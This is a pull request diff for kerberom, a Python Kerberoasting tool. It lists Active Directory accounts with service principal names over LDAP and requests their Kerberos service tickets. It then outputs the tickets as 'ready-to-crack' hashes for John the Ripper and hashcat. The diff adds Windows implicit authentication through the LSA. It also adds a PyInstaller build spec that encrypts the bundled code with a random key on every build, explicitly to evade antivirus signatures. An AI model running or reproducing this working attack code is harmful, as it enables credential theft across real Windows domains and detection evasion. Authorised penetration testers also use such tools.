### PR TITLE
kerberom: new version adding Windows support and Windows implicit authentication mechanisms

### DIFF
--- a/run/kerberom/README.md
+++ b/run/kerberom/README.md
@@ -11,21 +11,21 @@ Cracking these tickets gives you the associated accounts' password within the Ac
 
 **You do not need any third-party tools that are OS dependents (like mimikatz or PowerShell) and do not need privileged rights to use kerberom**
 
-
 Author
 ------
-- Fist0urs, eddy (dot) maaalou (at) gmail (dot) com
+- Jean-Christophe Delaunay, jean-christophe.delaunay (at) synacktiv.com
 
 Greetings
 ---------
 - meskal
 - The amazing impacket (https://github.com/CoreSecurity/impacket)
+- Sylvain Monne, sylvain (dot) monne (at) solucom (dot) fr
 
 kerberom.py
 -----------
 
-Prerequisites :
-- A domain account (eventually its SID if NTLM authentication is disabled upon Kerberos)
+Prerequisites in explicit authentication:
+- A domain account (eventually its SID if NTLM authentication is disabled upon Kerberos) and its credentials
 - The address of the Domain Controler (can be a FQDN or IP address)
 - The FQDN of the domain
 - (Eventually a list of SPN with format "samaccountname$spn", field "samaccountname" can be "unknown")
@@ -33,24 +33,43 @@ Prerequisites :
 Tickets can be retrieved using NTLM authentication but also Kerberos (this one needs you to provide the account SID as you will have to use it to make up your PAC)
 and providing password or hash (format "LM:NT") of the account used.
 
+Prerequisites in implicit authentication (Windows only):
+- Being in a user logged-on context
+- The address of the Domain Controler (can be a FQDN or IP address)
+- The FQDN of the domain
+- (Eventually a list of SPN with format "samaccountname$spn", field "samaccountname" can be "unknown")
+
 Install
 -------
-kerberom is a standalone script, all you need is ldap3 (https://github.com/cannatag/ldap3), argparse and pyasn1 modules.
+kerberom is a standalone script/binary
 
+Compilation (Windows only):
+--------------------------
+HOW-TO is provided in bin/BUILD.md
+
+The binary is generated using PyInstaller and a new AES256 encryption key is generated each time the binary is compiled. This is only to break anti-viruses' signature engine based on kerberom source code.
+
+Known-bug
+---------
+Depending on your pyasn1 version, you may encounter parsing errors using explicit authentication.
 
 Usage
 -----
 ```
-usage: kerberom.py [-h] -u USERNAME -d DOMAINCONTROLERADDR [-o OUTPUTFILE]
+usage: kerberom.py [-h] [--implicit IMPLICIT] [-u USERNAME]
+                   [-d DOMAINCONTROLERADDR] [-o OUTPUTFILE]
                    [-iK INPUT_TGT_FILE] [-p PASSWORD | --hash HASH] [-v]
                    [--delta DELTA] [-k USER_SID | -i INPUTFILE_SPN]
 
-Script to retrieve all accounts having an SPN and retrieving their TGS in
-rc4-hmac encrypted blob in John The Ripper 'krb5tgs' format and hashcat's one,
-by Fist0urs
+Tool to retrieve all accounts having an SPN and their TGS in arc4-hmac
+encrypted blob. Output is ready-to-crack for John The Ripper 'krb5tgs' and
+hashcat 13100 formats, by jean-christophe.delaunay <at> synacktiv.com
 
 optional arguments:
   -h, --help            show this help message and exit
+  --implicit IMPLICIT   use Windows implicit authentication mechanism. Format
+                        is (FQDN/IP)_DomainController[:port]@FQDN_Domain. eg:
+                        192.168.13.13:389@infra.kerberos.com
   -u USERNAME, --username USERNAME
                         format must be userName@DomainFQDN. eg:
                         fistouille@infra.kerberos.com
@@ -58,7 +77,9 @@ optional arguments:
                         domain Controler FQDN. Can be an IP but ldap retrieval
                         through kerberos method will not work (-k)
   -o OUTPUTFILE, --outputfile OUTPUTFILE
-                        outputfile where to store results
+                        outputfile where to store results and extracted
+                        accounts having an SPN (to be used with '-i'
+                        afterward)
   -iK INPUT_TGT_FILE, --input_TGT_File INPUT_TGT_FILE
                         user's provided file containing TGT. Parsing is
                         determined by extension (.ccache for Linux , Windows
@@ -70,7 +91,7 @@ optional arguments:
   -v, --verbose         increase verbosity level
   --delta DELTA         set time delta in Kerberos tickets. Useful when DC is
                         not on the same timezone. Format is
-                        "(+/-)hours:minutes:seconds", e.g. --delta="+00:05:00"
+                        "(+/-)hours:minutes:seconds", eg. --delta="+00:05:00"
                         or --delta="-02:00:00"
   -k USER_SID, --user_sid USER_SID
                         force ldap SPN retrieval through kerberos, sid is
@@ -80,4 +101,3 @@ optional arguments:
                         file. Format must be 'samaccountname$spn' on each
                         line, 'samaccountname' can be 'unknown'
 ```
-

--- a/run/kerberom/bin/BUILD.md
+++ b/run/kerberom/bin/BUILD.md
@@ -1,0 +1,35 @@
+Compilation was successful on an x64 architecture with the following dependencies:
+
+- Python: 2.7.13 (x86)
+- PyInstaller: 3.2.1 (x86)
+- Microsoft Visual C++ Compiler for Python 2.7 (https://www.microsoft.com/en-us/download/details.aspx?id=44266)
+- pywin32
+- pyasn1==0.2.3
+- ldap3==2.2.4
+- pyopenssl
+- pycrypto
+
+Please let me know if some dependencies are missing.
+
+Before compiling with PyInstaller, please make sure to replace 'ABSOLUTE_PATH_TO_KERBEROM_FOLDER' in 'kerberom.spec'.
+
+For example, if your kerberom folder location follows this scheme:
+
+```
+C:\
+--> Python27\
+--> Users\
+    --> Foo\
+        --> Desktop\
+            --> kerberom\
+                --> modules\
+                --> kerberom.py
+                --> kerberom.spec
+                --> INSTALL.md
+```
+
+ABSOLUTE_PATH_TO_KERBEROM_FOLDER will be 'C:\\\\Users\\\\Foo\\\\Desktop\\\\kerberom'
+
+Compilation command will be:
+
+cmd> C:\Python27\Scripts\pyinstaller.exe "C:\Users\Foo\Desktop\kerberom\kerberom.spec"

--- a/run/kerberom/kerberom.py
+++ b/run/kerberom/kerberom.py
@@ -1,11 +1,12 @@
-#!/usr/bin/python
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you
 # retain this notice you can do whatever you want with this stuff. If we meet
 # some day, and you think this stuff is worth it, you can buy me a beer in
 # return.   Fist0urs
 # ----------------------------------------------------------------------------
+
+#!/usr/bin/python
 
 # -*- coding: utf-8 -*-
 
@@ -21,22 +22,22 @@ import datetime
 from ldap3 import Server, Connection, SIMPLE, \
     SYNC, ALL, SASL, NTLM
 
-import ldap3.core.exceptions
-
 from rom.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5
 from rom.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \
-    decrypt_as_rep, decrypt_tgs_rep
+    decrypt_as_rep, decrypt_tgs_rep, extract_tgs_data
 from rom.ccache import CCache, kdc_rep2ccache
 from rom.util import epoch2gt, gt2epoch
 
 
 LDAP_PORT="389"
 
+# All not disabled user accounts except 'krbtg' account
 LDAP_QUERY = "(&\
               (objectClass=user)\
               (servicePrincipalName=*)\
               (!(objectClass=computer))\
               (!(cn=krbtgt))\
+              (!(userAccountControl:1.2.840.113556.1.4.803:=2))\
               )"
 
 ATTRIBUTES_TO_RETRIEVE = ['sAMAccountName',
@@ -66,21 +67,12 @@ dico_etypes={'1':'des-cbc-crc',
              '24':'rc4-hmac-exp',
              '65':'subkey-keymaterial'}
 
-# Console colors
-W = '\033[0m'  # white (normal)
-R = '\033[31m'  # red
-G = '\033[32m'  # green
-O = '\033[33m'  # orange
-B = '\033[34m'  # blue
-P = '\033[35m'  # purple
-C = '\033[36m'  # cyan
-GR = '\033[37m'  # gray
-
 verbose_level = 0
 
 class AttackParameters():
     def __init__(self, user_account = None, realm = None,
                 DC_addr = None, password = None,
+                implicit_authentication = None,
                 sid = None, key = None,
                 auth_gssapi = False, list_spn = None,
                 tgt = None, session_key = None,
@@ -92,6 +84,7 @@ class AttackParameters():
         self.realm = realm
         self.DC_addr = DC_addr
         self.password = password
+        self.implicit_authentication = implicit_authentication
         self.sid = sid
         self.auth_gssapi = auth_gssapi
         self.key = key
@@ -106,8 +99,7 @@ class AttackParameters():
     # We ask a TGT with PAC when LDAP connection is made through gssapi
     def get_TGT(self, need_pac = False):
         DC_addr = self.DC_addr
-        WRITE_STDOUT(G + "\nAsking " + B + '\'' + DC_addr\
-                           + '\'' + G + " for a TGT\n" + W)
+        WRITE_STDOUT("\nAsking '" + DC_addr + "' for a TGT\n")
 
         WRITE_STDOUT('  [+] Building AS-REQ for %s...' % DC_addr)
 
@@ -142,13 +134,11 @@ class AttackParameters():
         self.tgt = as_rep['ticket']
         WRITE_STDOUT(' Done!\n')
 
-        WRITE_STDOUT(G + "TGT retrieved for user " + B + '\''\
-                         + self.user_account + '\'\n' + W)
+        WRITE_STDOUT("TGT retrieved for user '" + self.user_account + "'\n")
 
 
     def Parse_TGT_File(self, tgt_file):
-        WRITE_STDOUT('\n' + P + '[+] Parsing TGT file '+ B + '\'' + tgt_file \
-        + '\'\n' + W)
+        WRITE_STDOUT("\n[+] Parsing TGT file '" + tgt_file + "'\n")
         tgt_cache_data = CCache.load(tgt_file)
 
         tgt_credentials =  tgt_cache_data.credentials[0]
@@ -162,14 +152,13 @@ class AttackParameters():
         WRITE_STDOUT('  [+] Extracting TGT and session key... Done!\n\n')
 
         if tgt_credentials.key.keytype != 23:
-            WRITE_STDOUT(R + '[+] Warning, encryption type is '\
-                        + B + '\'' + dico_etypes[str(tgt_credentials.key.keytype)]\
-                        + '\'' + R + ' asking for a new TGT in RC4...\n' + W)
+            WRITE_STDOUT("[+] Warning, encryption type is '" + dico_etypes[str(tgt_credentials.key.keytype)]\
+                        + "' asking for a new TGT in RC4...\n")
             self.tgt = self.Ask_TGT_RC4()
 
     def TGS_attack(self):
-        WRITE_STDOUT('\n' + P + '[+] Iterating through SPN and building '\
-                    + "corresponding TGS-REQ\n" + W)
+        WRITE_STDOUT('\n[+] Iterating through SPN and building '\
+                    + "corresponding TGS-REQ\n")
 
         if self.outputfile_path != None:
             try:
@@ -205,7 +194,6 @@ class AttackParameters():
             if not tgs_rep:
                 continue
 
-            # horrible asn1 structure...
             c=""
 
             for i in tgs_rep['ticket']['enc-part']['cipher'].asNumbers():
@@ -213,15 +201,15 @@ class AttackParameters():
                 c =c + hex(i).replace("0x",'').zfill(2)
                 existing_SPN = 1
 
-            sys.stdout.write("$krb5tgs$23$*" + samaccountname + "$"\
-                + self.DC_addr + "$" + target_service + "/" + target_host.split(':')[0] + "*$"\
-                + c[:32] + "$" + c[32:] + '\n')
-            sys.stdout.flush()
-
             if self.outputfile_path != None:
-                outputfile.write("$krb5tgs$23$*" + samaccountname + "$"\
+                outputfile.write(samaccountname + ":$krb5tgs$23$*" + samaccountname + "$"\
                 + self.DC_addr + "$" + target_service + "/" + target_host.split(':')[0] + "*$"\
                 + c[:32] + "$" + c[32:] + '\n')
+            else:
+                sys.stdout.write(samaccountname + ":$krb5tgs$23$*" + samaccountname + "$"\
+                + self.DC_addr + "$" + target_service + "/" + target_host.split(':')[0] + "*$"\
+                + c[:32] + "$" + c[32:] + '\n')
+                sys.stdout.flush()
 
         if self.outputfile_path != None:
             outputfile.close()
@@ -238,21 +226,21 @@ class AttackParameters():
         # All went good!
         if existing_SPN != 0:
             if self.outputfile_path != None:
-                WRITE_STDOUT(O + "All done! All tickets are stored in a "\
-                + "ready-to-crack format in " + B + '\'' + self.outputfile_path + '\''\
-                + O + " and SPN are stored in " + B + '\'' + dirname + filename\
-                + '\'\n' + W)
+                WRITE_STDOUT("All done! All tickets are stored in a "\
+                + "ready-to-crack format in '" + self.outputfile_path\
+                + "' and SPN are stored in '" + dirname + filename\
+                + "'\n")
         else:
-            sys.stderr.write(O + "There are no accounts with an SPN \n" + W)
+            sys.stderr.write("There are no accounts with an SPN \n")
             sys.stderr.flush()
 
     def forge_custom_TGS_REQ(self, target_service, target_host,
                              subkey, nonce, current_time, spn,
                              samaccountname):
 
-        WRITE_STDOUT('  [+] Building TGS-REQ for SPN ' + B + '\'' + spn\
-                +'\'' + W + ' and account ' + B + '\'' + samaccountname\
-                + '\'' + W + '...')
+        WRITE_STDOUT("  [+] Building TGS-REQ for SPN '" + spn\
+                +"' and account '" + samaccountname\
+                + "'...\n")
 
         tgs_req = build_tgs_req(self.realm, target_service, target_host,
                                 self.realm, self.user_account, self.tgt,
@@ -276,9 +264,9 @@ def ldap_get_all_users_spn(AttackParameters, port):
 
     # Kerberos authentication
     if AttackParameters.auth_gssapi :
-        WRITE_STDOUT(G + "\nConnecting to " + B + '\'' + AttackParameters.DC_addr \
-                    + '\'' + W + G + " using ldap protocol and"\
-                    + " Kerberos authentication!\n" + W)
+        WRITE_STDOUT("\nConnecting to '" + AttackParameters.DC_addr \
+                    + "' using ldap protocol and"\
+                    + " Kerberos authentication!\n")
 
         WRITE_STDOUT('  [+] Creating ticket ccache file %r...' % ccache_file)
         cc = CCache((AttackParameters.realm, AttackParameters.user_account))
@@ -294,8 +282,8 @@ def ldap_get_all_users_spn(AttackParameters, port):
 
     # NTLM authentication
     else :
-        WRITE_STDOUT(G + "Connecting to " + B + '\'' + AttackParameters.DC_addr + '\'' + W +\
-                         G + " using ldap protocol and NTLM authentication!\n" + W)
+        WRITE_STDOUT("Connecting to '" + AttackParameters.DC_addr\
+                     +"' using ldap protocol and NTLM authentication!\n")
 
         s = Server(AttackParameters.DC_addr, port=389, get_info=ALL)
 
@@ -310,14 +298,14 @@ def ldap_get_all_users_spn(AttackParameters, port):
     # Now we should be connected to the DC through LDAP
     try :
         c.open()
-    except ldap3.core.exceptions.LDAPSocketOpenError as e:
-        WRITE_STDOUT(R + "ldap connection error: %s\n" % e + W)
+    except :
+        WRITE_STDOUT("ldap connection error: %s\n")
         sys.exit(1)
 
     try :
         r = c.bind()
     except:
-        WRITE_STDOUT(R + "Cannot connect to ldap, exiting.\n" + W)
+        WRITE_STDOUT("Cannot connect to ldap, exiting.\n")
         sys.exit(1)
 
     # Query to find all accounts having a servicePrincipalName
@@ -330,7 +318,7 @@ def ldap_get_all_users_spn(AttackParameters, port):
             )
 
     if not c.response:
-        WRITE_STDOUT(R + "Cannot find any SPN, wrong user/credentials?\n" + W)
+        WRITE_STDOUT("Cannot find any SPN, wrong user/credentials?\n")
         sys.exit(1)
 
     WRITE_STDOUT('  [+] Retrieving all SPN and corresponding accounts...')
@@ -369,8 +357,8 @@ def ldap_get_all_users_spn(AttackParameters, port):
     # Disconnecting from DC
     WRITE_STDOUT(' Done!\n')
     c.unbind()
-    WRITE_STDOUT(G + "Successfully disconnected from "+ B + '\''\
-                 + AttackParameters.DC_addr + '\'\n' + W)
+    WRITE_STDOUT("Successfully disconnected from '"\
+                 + AttackParameters.DC_addr + "'\n")
 
     # write to SPN_outputfile
     if AttackParameters.outputfile_path != None:
@@ -407,34 +395,36 @@ def parse_TGS_REP(sock, subkey, spn, samaccountname, kdc_addr):
 
         # MAGIC, not RC4 received...
         if len(tgs_rep) == 2 and not tgs_rep_enc:
-            WRITE_STDOUT(R + ' Only rc4-hmac supported and encryption type\
+            WRITE_STDOUT(' Only rc4-hmac supported and encryption type\
                             is \'%s\'. Skipping this account...\n\n' %\
-                            dico_etypes[tgs_rep] + W)
+                            dico_etypes[tgs_rep])
             return None, None
         else:
-            WRITE_STDOUT(' Done!\n' + G + '  [+] Got encrypted ticket for SPN '\
-                     + B + '\'' + spn + '\'' + G + ' and account ' + B + '\''\
-                     + samaccountname + '\'\n' + W)
+            WRITE_STDOUT(" Done!\n[+] Got encrypted ticket for SPN '"\
+                     + spn + "' and account '" + samaccountname + "'\n")
             return tgs_rep, tgs_rep_enc
 
 
 def parse_arguments():
-    parser = argparse.ArgumentParser(description="Script to retrieve all accounts\
-    having an SPN and retrieving their TGS in rc4-hmac encrypted blob in John The Ripper\
-    'krb5tgs' format and hashcat's one, by Fist0urs")
+    parser = argparse.ArgumentParser(description="Tool to retrieve all accounts\
+    having an SPN and their TGS in arc4-hmac encrypted blob. Output is ready-to-crack for John The Ripper\
+    'krb5tgs' and hashcat 13100 formats, by jean-christophe.delaunay <at> synacktiv.com")
 
     group = parser.add_mutually_exclusive_group(required=False)
     group2 = parser.add_mutually_exclusive_group(required=False)
 
-    parser.add_argument('-u', '--username', required=True, help="format must be\
+    parser.add_argument('--implicit', required=False, help="use Windows implicit\
+    authentication mechanism. Format is (FQDN/IP)_DomainController[:port]@FQDN_Domain. eg: 192.168.13.13:389@infra.kerberos.com")
+
+    parser.add_argument('-u', '--username', required=False, help="format must be\
     userName@DomainFQDN. eg: fistouille@infra.kerberos.com")
 
-    parser.add_argument('-d', '--domainControlerAddr', required=True, help="domain\
+    parser.add_argument('-d', '--domainControlerAddr', required=False, help="domain\
     Controler FQDN. Can be an IP but ldap retrieval through kerberos method will not\
     work (-k)")
 
     parser.add_argument('-o', '--outputfile', required=False, help="outputfile where\
-    to store results")
+    to store results and extracted accounts having an SPN (to be used with '-i' afterward)")
 
     parser.add_argument('-iK', '--input_TGT_File', required=False, help="user's provided file\
     containing TGT. Parsing is determined by extension (.ccache for Linux\
@@ -451,7 +441,7 @@ def parse_arguments():
 
     parser.add_argument('--delta', required=False,
     help="set time delta in Kerberos tickets. Useful when DC is not on the same timezone.\
-    Format is \"(+/-)hours:minutes:seconds\", e.g. --delta=\"+00:05:00\" or --delta=\"-02:00:00\"")
+    Format is \"(+/-)hours:minutes:seconds\", eg. --delta=\"+00:05:00\" or --delta=\"-02:00:00\"")
 
     group2.add_argument('-k', '--user_sid', required=False, help="force ldap SPN\
     retrieval through kerberos, sid is mandatory. Cannot be used with '-i'")
@@ -471,86 +461,228 @@ if __name__ == '__main__':
     from getpass import getpass
 
     options = parse_arguments()
-    user_name, user_realm = options.username.split('@', 1)
-
-    DataSubmitted = AttackParameters(DC_addr = options.domainControlerAddr.lower(),
-                                 user_account = user_name,
-                                 realm = user_realm.upper(),
-                                 outputfile_path = options.outputfile)
-
-    ccache_file = ccache_file + str(os.geteuid())
-
-    if options.password :
-        DataSubmitted.password = options.password
-        DataSubmitted.key = (RC4_HMAC, ntlm_hash(DataSubmitted.password).digest())
-    elif options.hash:
-        lm_hash, nt_hash = options.hash.split(':')
-        # assume right format
-        if len(lm_hash) != 32 or len(nt_hash) != 32:
-            WRITE_STDOUT("Error: format must be \"LM:NT\"")
-            sys.exit(1)
-        DataSubmitted.key = (RC4_HMAC, nt_hash.decode('hex'))
-        DataSubmitted.password = options.hash
-        assert len(DataSubmitted.key[1]) == 16
-    else:
-        DataSubmitted.password = getpass('Password: ')
-        DataSubmitted.key = (RC4_HMAC, ntlm_hash(DataSubmitted.password).digest())
-
-    if options.user_sid :
-        DataSubmitted.sid = options.user_sid
-        DataSubmitted.auth_gssapi = True
-    elif options.inputfile_spn :
-        try:
-            inputfile_spn = open(options.inputfile_spn, 'r')
-
-            WRITE_STDOUT(G + "Retrieving sAMAccountName "\
-                            + "and servicePrincipalName from file " \
-                            + B + '\'' + options.inputfile_spn +\
-                            '\'' + W + G + "..." + W)
-
-            DataSubmitted.list_spn = construct_list_spn_from_file(inputfile_spn)
-            WRITE_STDOUT(" Done!\n")
-        except:
-            WRITE_STDOUT(R + "Cannot open " + B + '\'' + \
-                            options.inputfile_spn + '\', exiting\n' + W)
-            sys.exit(1)
-
-    if options.input_TGT_File :
-        DataSubmitted.Parse_TGT_File(options.input_TGT_File)
 
     if options.verbose:
         verbose_level = 1
 
-    if options.delta:
-        sign = options.delta[0]
-        time_array = map(int, options.delta[1:].split(':'))
-
-        if sign == '+':
-            DataSubmitted.time_delta = datetime.timedelta(hours=time_array[0], minutes=time_array[1], seconds=time_array[2]).total_seconds()
-        elif sign == '-':
-            DataSubmitted.time_delta = - datetime.timedelta(hours=time_array[0], minutes=time_array[1], seconds=time_array[2]).total_seconds()
-        else:
-            sys.stderr.write(O + "Sign must be '+' or '-'. Exiting. \n" + W)
+    # assume implicit authentication
+    if options.implicit:
+        try:
+            from rom.rich import ConnectToLDAP, LDAPsearch, KerberosInit, Get_TGS
+            from ctypes import c_char_p as PCHAR
+        except ImportError:
+            sys.stderr.write("Cannot import ctypes related modules. Must be used on Windows. Exiting")
             sys.stderr.flush()
             sys.exit(1)
 
-    # launching attack!
 
-    # file containing SPN is provided
-    if DataSubmitted.list_spn:
-        if not DataSubmitted.tgt:
-            DataSubmitted.get_TGT()
-        DataSubmitted.TGS_attack()
-    else:
-        # authentification through Kerberos
-        if DataSubmitted.auth_gssapi:
-            if not DataSubmitted.tgt:
-                DataSubmitted.get_TGT(need_pac = True)
-            DataSubmitted.list_spn = ldap_get_all_users_spn(DataSubmitted, LDAP_PORT)
-            DataSubmitted.TGS_attack()
-        # authentification through NTLM
+        outputfile = ""
+        if options.outputfile != None:
+            try:
+                outputfile = open(options.outputfile,'w')
+            except:
+                WRITE_STDOUT('[-] Cannot open \'%s\' exiting. \n' % self.outputfile_path)
+                sys.exit(1)
+
+        domainControlerAddr, user_realm = options.implicit.split('@')
+
+        if options.inputfile_spn:
+            try:
+                inputfile_spn = open(options.inputfile_spn, 'r')
+
+                WRITE_STDOUT("[+] Retrieving sAMAccountName "\
+                             "and servicePrincipalName from file '" \
+                             + options.inputfile_spn + "'...\n")
+
+                list_spn = construct_list_spn_from_file(inputfile_spn)
+                WRITE_STDOUT(" Done!\n")
+            except:
+                WRITE_STDOUT("[-] Cannot open '" + options.inputfile_spn + "' exiting\n")
+                sys.exit(1)
+        # Retrieve spn through LDAP
         else:
-            DataSubmitted.list_spn = ldap_get_all_users_spn(DataSubmitted, LDAP_PORT)
+            pDN = PCHAR("DC="+",DC=".join(user_realm.upper().split('.')))
+
+            pFilter = PCHAR(LDAP_QUERY)
+
+            Attributes = ["sAMAccountName", "servicePrincipalName", "memberOf", "primaryGroupID", 0]
+            pAttributes = (PCHAR * len(Attributes))(*Attributes)
+
+            WRITE_STDOUT("\nConnecting to '" + domainControlerAddr \
+                    + "' using ldap protocol and"\
+                    + " Windows implicit authentication...")
+
+            hLDAPConnection = ConnectToLDAP(domainControlerAddr)
+
+            if hLDAPConnection == 0:
+                sys.exit(1)
+
+            WRITE_STDOUT(" Done!\n")
+
+            WRITE_STDOUT("[+] Searching for all accounts having an SPN...")
+
+            list_spn = LDAPsearch(hLDAPConnection, pDN, pFilter, pAttributes)
+
+            if list_spn == 0:
+                WRITE_STDOUT("\n[-] Cannot find any SPN, exiting.")
+                sys.exit(1)
+            else:
+                WRITE_STDOUT(" Done!\n")
+
+        dirname = ""
+        filename = ""
+        if options.outputfile != None:
+            # where are stored SPN
+            dirname = os.path.dirname(options.outputfile)
+            # current dir
+            if dirname == '':
+                dirname = './'
+            else:
+                dirname = dirname + '/'
+            filename = os.path.basename(options.outputfile)
+            filename = 'SPN_' + filename
+            outputfile_spn = open(dirname + filename, 'w')
+
+            #iterate through SPN
+            for accounts in list_spn:
+                line_to_write = accounts['samaccountname']+'$'\
+                                +accounts['serviceprincipalname']
+                if accounts.has_key('memberof'):
+                    line_to_write = line_to_write + '$' + accounts['memberof']
+                if accounts.has_key('primarygroupid'):
+                    line_to_write = line_to_write + '$primaryGroupID:'\
+                                    + accounts['primarygroupid']
+                outputfile_spn.write(line_to_write + '\n')
+            outputfile_spn.close()
+
+        # get current logon context
+
+        WRITE_STDOUT("[+] Getting current user's logon context...")
+
+        hLsaConnection, dwKerberosAuthenticationPackageId = KerberosInit()
+
+        if hLsaConnection == None or dwKerberosAuthenticationPackageId == None:
+            WRITE_STDOUT("\n[-] Cannot acquire handle on LSA and/or Kerberos authentication Package ID, exiting.")
+            sys.exit(1)
+
+        WRITE_STDOUT(" Done!\n")
+
+        WRITE_STDOUT('[+] Iterating through SPN and asking for corresponding TGS...\n')
+        for SPNentry in list_spn:
+            samaccountname = SPNentry["samaccountname"]
+            spn = SPNentry["serviceprincipalname"]
+            target_service, target_host = spn.split('/', 1)
+
+            WRITE_STDOUT('  [+] Retrieving ticket for account \"%s\" and SPN \"%s\"\n' %(samaccountname, spn))
+            data = Get_TGS(hLsaConnection, dwKerberosAuthenticationPackageId, SPNentry)
+
+            if data == 0:
+                continue
+
+            tgs_rep = extract_tgs_data(data.strip().decode("hex"))
+
+            payload = ""
+
+            for i in tgs_rep['enc-part']['cipher'].asNumbers():
+                # zfill make sure a leading '0' is added when needed
+                payload =payload + hex(i).replace("0x",'').zfill(2)
+                existing_SPN = 1
+
+            if options.outputfile != None:
+                outputfile.write(samaccountname+":$krb5tgs$23$*" + samaccountname + "$"\
+                + domainControlerAddr.replace(':', '-') + "$" + target_service + "/" + target_host.split(':')[0] + "*$"\
+                + payload[:32] + "$" + payload[32:] + '\n')
+            else:
+                sys.stdout.write(samaccountname+":$krb5tgs$23$*" + samaccountname + "$"\
+                + domainControlerAddr.replace(':', '-') + "$" + target_service + "/" + target_host.split(':')[0] + "*$"\
+                + payload[:32] + "$" + payload[32:] + '\n')
+                sys.stdout.flush()
+
+        if options.outputfile != None:
+            WRITE_STDOUT("All done! All tickets are stored in a "\
+                            + "ready-to-crack format in '" + options.outputfile\
+                            + "' and SPN are stored in '" + dirname + filename\
+                            + "'\n")
+    # explicit authentication
+    else:
+        user_name, user_realm = options.username.split('@', 1)
+        DataSubmitted = AttackParameters(DC_addr = options.domainControlerAddr.lower(),
+                                     user_account = user_name,
+                                     realm = user_realm.upper(),
+                                     outputfile_path = options.outputfile)
+
+        # linux only
+        try:
+            ccache_file = ccache_file + str(os.geteuid())
+        except:
+            ccache_file = None
+
+        if options.password :
+            DataSubmitted.password = options.password
+            DataSubmitted.key = (RC4_HMAC, ntlm_hash(DataSubmitted.password).digest())
+        elif options.hash:
+            lm_hash, nt_hash = options.hash.split(':')
+            # assume right format
+            if len(lm_hash) != 32 or len(nt_hash) != 32:
+                WRITE_STDOUT("Error: format must be \"LM:NT\"")
+                sys.exit(1)
+            DataSubmitted.key = (RC4_HMAC, nt_hash.decode('hex'))
+            DataSubmitted.password = options.hash
+            assert len(DataSubmitted.key[1]) == 16
+        else:
+            DataSubmitted.password = getpass('Password: ')
+            DataSubmitted.key = (RC4_HMAC, ntlm_hash(DataSubmitted.password).digest())
+
+        if options.user_sid :
+            DataSubmitted.sid = options.user_sid
+            DataSubmitted.auth_gssapi = True
+        elif options.inputfile_spn :
+            try:
+                inputfile_spn = open(options.inputfile_spn, 'r')
+
+                WRITE_STDOUT("Retrieving sAMAccountName "\
+                                + "and servicePrincipalName from file '" \
+                                + options.inputfile_spn + "'...")
+
+                DataSubmitted.list_spn = construct_list_spn_from_file(inputfile_spn)
+                WRITE_STDOUT(" Done!\n")
+            except:
+                WRITE_STDOUT("Cannot open '" + options.inputfile_spn + "', exiting\n")
+                sys.exit(1)
+
+        if options.input_TGT_File :
+            DataSubmitted.Parse_TGT_File(options.input_TGT_File)
+
+        if options.delta:
+            sign = options.delta[0]
+            time_array = map(int, options.delta[1:].split(':'))
+
+            if sign == '+':
+                DataSubmitted.time_delta = datetime.timedelta(hours=time_array[0], minutes=time_array[1], seconds=time_array[2]).total_seconds()
+            elif sign == '-':
+                DataSubmitted.time_delta = - datetime.timedelta(hours=time_array[0], minutes=time_array[1], seconds=time_array[2]).total_seconds()
+            else:
+                sys.stderr.write("Sign must be '+' or '-'. Exiting. \n")
+                sys.stderr.flush()
+                sys.exit(1)
+
+        # launching attack!
+
+        # file containing SPN is provided
+        if DataSubmitted.list_spn:
             if not DataSubmitted.tgt:
                 DataSubmitted.get_TGT()
             DataSubmitted.TGS_attack()
+        else:
+            # authentification through Kerberos
+            if DataSubmitted.auth_gssapi:
+                if not DataSubmitted.tgt:
+                    DataSubmitted.get_TGT(need_pac = True)
+                DataSubmitted.list_spn = ldap_get_all_users_spn(DataSubmitted, LDAP_PORT)
+                DataSubmitted.TGS_attack()
+            # authentification through NTLM
+            else:
+                DataSubmitted.list_spn = ldap_get_all_users_spn(DataSubmitted, LDAP_PORT)
+                if not DataSubmitted.tgt:
+                    DataSubmitted.get_TGT()
+                DataSubmitted.TGS_attack()

--- a/run/kerberom/kerberom.spec
+++ b/run/kerberom/kerberom.spec
@@ -1,0 +1,65 @@
+# ----------------------------------------------------------------------------
+# "THE BEER-WARE LICENSE" (Revision 42):
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you
+# retain this notice you can do whatever you want with this stuff. If we meet
+# some day, and you think this stuff is worth it, you can buy me a beer in
+# return.   Fist0urs
+# ----------------------------------------------------------------------------
+
+# -*- mode: python -*-
+
+import sys, string, random
+
+sys.path.append("./modules")
+
+def random_key():
+    charset = string.printable
+    return ''.join(random.choice(charset) for _ in range(16))
+
+def random_name(name_length = 1):
+    charset = string.ascii_lowercase
+    return ''.join(random.choice(charset) for _ in range(name_length))
+
+block_cipher = pyi_crypto.PyiBlockCipher(key = random_key())
+
+a = Analysis(['kerberom.py', 'kerberom.spec'],
+             pathex=['ABSOLUTE_PATH_TO_KERBEROM_FOLDER'],
+             binaries=[],
+             datas=[],
+             hiddenimports=[],
+             hookspath=[],
+             runtime_hooks=[],
+             excludes=["pywin", "pywin.debugger", "pywin.debugger.dbgcon",
+                       "pywin.dialogs", "pywin.dialogs.list", "Tkconstants",
+                       "Tkinter", "tcl", "Carbon", "Carbon.Files", "email",
+                       "email.utils", "_scproxy", "urllib.parse", "winreg",
+                       "queue", "extend.ExtendedOperationsRoot",
+                       "backports.ssl_match_hostname", "future.types.newstr",
+                       "gssapi", "unittest", "xml", "xml.parsers.expat",
+                       "w9xpopen.exe", "wx", "org", "EasyDialogs", "termios",
+                       "pwd", "fcntl", "readline", "org.python", "backports",
+                       "vms_lib", "'java.lang'", "java", "'xml.parsers'",
+                       "'Carbon.File'", "MacOS", "macresource", "gestalt",
+                       "_dummy_threading", "SOCKS", "rourl2path", "'dbm.ndbm'",
+                       "gdbm", "'dbm.gnu'", "'dbm.dumb'", "bsddb3", "_pybsddb",
+                       "dbm", "_sysconfigdata", "grp", "'test.support'", "_datetime",
+                       "reprlib.recursive_repr", "_thread.get_ident", "riscosenviron",
+                       "riscospath", "riscos", "ce", "_emx_link", "os2", "posix",
+                       "resource"],
+             win_no_prefer_redirects=False,
+             win_private_assemblies=False,
+             cipher=block_cipher)
+
+pyz = PYZ(a.pure, a.zipped_data,
+          cipher=block_cipher)
